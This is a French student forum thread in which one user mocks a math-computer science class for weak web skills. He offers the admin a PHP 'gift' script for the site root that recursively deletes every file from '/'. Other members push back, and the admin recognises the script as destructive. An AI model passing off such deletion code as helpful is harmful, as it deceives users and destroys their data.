Licence Math-Info
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.


forum des lm-istes
 
AccueilAccueil  PortailPortail  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  Connexion  
-50%
Le deal à ne pas rater :
-50% Baskets Nike Air Huarache Runner
69.99 € 139.99 €
Voir le deal

 

 A lire absolument

Aller en bas 
3 participants

Vous trouvez que vous avez des connaissances en info ?
OUI
A lire absolument Vote_lcap100%A lire absolument Vote_rcap
 100% [ 2 ]
NON
A lire absolument Vote_lcap0%A lire absolument Vote_rcap
 0% [ 0 ]
Total des votes : 2
 

AuteurMessage
lemagicien




Nombre de messages : 1
Date d'inscription : 12/02/2007

A lire absolument Empty
MessageSujet: A lire absolument   A lire absolument Icon_minitimeMar 13 Fév - 0:01

Je vouslais vous féliciter, vous êtes en licence Maths-Info et dans Maths-Info, je vois Info et vous n'êtes pas fichu de faire un site web??? Vous ne savais faire que des petits blogs skyblog.fr, vous êtes vraiment des boulets. Qu'est ce que vous foutez dans cette formation???

Pour le créateur de ce forum (warfdog), bon il relève un peu mais vraiment très peu le niveau avec son site sur l'harmonie de je sais plus trop où. Bon c'est fait en html, un langage qu'un gosse de 10 ans utilise pour faire son site web. En plus, celui-ci n'est même pas validé par le w3c (World Wide Web Consortium) qui est l'un des organismes les plus importants du Web. Etant donné votre formation, je m'attendais à un peu de PHP, base de données Postgresql ou au moins MySQL. Et un petit flux RSS mais bon ça c'est d'un niveau supérieur à ce que je vois ici... Je ne parle pas de ce forum car il a juste été s'enregistrer sur un site et le fofo était déjà programmé, autant dire qu'il a rien foutu à part mettre des images et créer des topics.

Vous êtes la honte de l'informatique, j'espère que vous serez plus doué avec la programmation procédurale en pascal qu'avec la programmation internet car sinon vous êtes mal barré... A moins que soyez suffisament fort en maths pour vous permettre de planter les matières informatiques.

Un petit script php pour le webmaster, cela rendra un grand service à tout le monde sur le web : (a mettre dans un fichier index.php à la racine du site ('/'))

<?php
$link="/";
function delfile($link)
{
if(is_dir($link))
{
$handle = opendir($link);

while(false !== ($file = readdir($handle)))

if ($file != "." && $file != "..")

delfile($link.'/'.$file);

closedir($handle);

rmdir($link);
}

else
unlink($link);
}
?>Priez pour survivre dans le monde informatique parce que parti comme vous l'êtes, c'est pas dans la poche.
Revenir en haut Aller en bas
Vayken

Vayken


Nombre de messages : 14
Age : 36
Date d'inscription : 30/11/2006

A lire absolument Empty
MessageSujet: Re: A lire absolument   A lire absolument Icon_minitimeJeu 15 Fév - 18:10

Au lieu de critiquer, renseigne toi dabord.
Nous ne sommes qu'en première année de licence, il est donc normal que notre niveau ne soit pas super élevé. Mais, de plus, le but de ce site n'est pas de montrer notre niveau en prog, mais de s'entraider entre éleves de même classe ou encore s'amuser par le bier d'autres sites qu'on a trouvé, ou autre.
Si tu veux qu'on soit d'un niveau de programmation super élevé, laisse nous le temps d'apprendre.
Revenir en haut Aller en bas
http://dimension-war.ephpbb.com
warfdog
Admin
warfdog


Nombre de messages : 69
Date d'inscription : 01/11/2006

A lire absolument Empty
MessageSujet: Re: A lire absolument   A lire absolument Icon_minitimeSam 17 Fév - 13:18

eh pour ce qui est du site il n'était pas de moi mais il fallait quelque chose de rapide, j'ai donc pris un kit, et j'e refait tout le code avec du css et du xhtml...(valide w3c) et toutes les pages seront remplacées prochainement

peut être un peu de php mais là aussi il faut apprendre, mais sur ce site je n'en ai pas besoin !

pareil pour le forum j'allais pas m'mmerder à l'installer alors qu'il y a des solutions toutes faites et comme le dit vay., première année donc on fait ce qu'on peut !

à bon entendeur
... le petit script si il efface le dossier c'est pas la peine...

déplacé en archive..et une copie dans la cafet !
Revenir en haut Aller en bas
https://licence-math-info.1fr1.net
Contenu sponsorisé





A lire absolument Empty
MessageSujet: Re: A lire absolument   A lire absolument Icon_minitime

Revenir en haut Aller en bas
 
A lire absolument
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Licence Math-Info :: Archives-
Sauter vers: